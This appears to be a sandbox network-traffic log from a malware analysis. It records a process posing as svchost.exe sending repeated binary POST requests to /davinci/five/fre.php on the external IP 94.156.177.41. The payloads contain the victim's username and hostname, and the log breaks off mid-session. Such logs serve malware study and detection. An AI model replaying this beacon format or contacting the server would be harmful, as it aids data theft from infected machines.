                        Nov 29, 2024 07:38:12.701448917 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.701504946 CET4978980192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.821427107 CET804978994.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.833655119 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.954926014 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:12.958235979 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:12.960716963 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:13.080638885 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:13.081566095 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:13.201878071 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.378434896 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.378524065 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.378688097 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.378731966 CET4980580192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.498648882 CET804980594.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.522273064 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.642441988 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.642546892 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.644509077 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.764523983 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:14.764600992 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:14.884749889 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:36.587616920 CET804980694.156.177.41192.168.2.4
                        Nov 29, 2024 07:38:36.587729931 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:36.587928057 CET4980680192.168.2.494.156.177.41
                        Nov 29, 2024 07:38:36.707761049 CET804980694.156.177.41192.168.2.4
                        • 94.156.177.41
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:00.088272095 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 176
                        Connection: close
                        Nov 29, 2024 07:37:00.208189011 CET | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.rujones364339JONES-PCk0FDD42EE188E931437F4FBE2CjPT2d
                        Nov 29, 2024 07:37:01.743693113 CET | 185 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:01 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:02.009470940 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 176
                        Connection: close
                        Nov 29, 2024 07:37:02.129462957 CET | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.rujones364339JONES-PC+0FDD42EE188E931437F4FBE2CQ9dCm
                        Nov 29, 2024 07:37:03.474642992 CET | 185 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:03 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:03.659991980 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:03.780451059 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:05.072637081 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:04 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:05.563555956 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:05.683691978 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:07.366683006 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:07.678630114 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:07.798758030 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:10.975239038 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:11.243534088 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:11.363666058 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:12.885755062 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:13.148227930 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:13.268210888 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:14.639606953 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:14 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:14.899337053 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:15.019341946 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:16.454478979 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:16 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:16.725650072 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:16.845716000 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:21.364413977 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:21 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:21.630054951 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:21.749991894 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:23.076883078 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:22 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:23.348701000 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:23.468794107 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:24.907257080 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:24 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:25.176871061 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:25.297010899 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:29.724714994 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:29 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:29.987917900 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:30.107975960 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:31.916888952 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:31 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:32.178077936 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:32.298013926 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:33.620527983 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:33 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:33.879084110 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:34.000360012 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:35.522377968 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:35 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:35.785371065 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:35.905770063 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:37.284110069 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:37 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:37.551649094 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:37.671797991 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:39.136181116 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:39.394356012 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:39.516381025 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:40.913743019 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:40 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:41.178177118 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
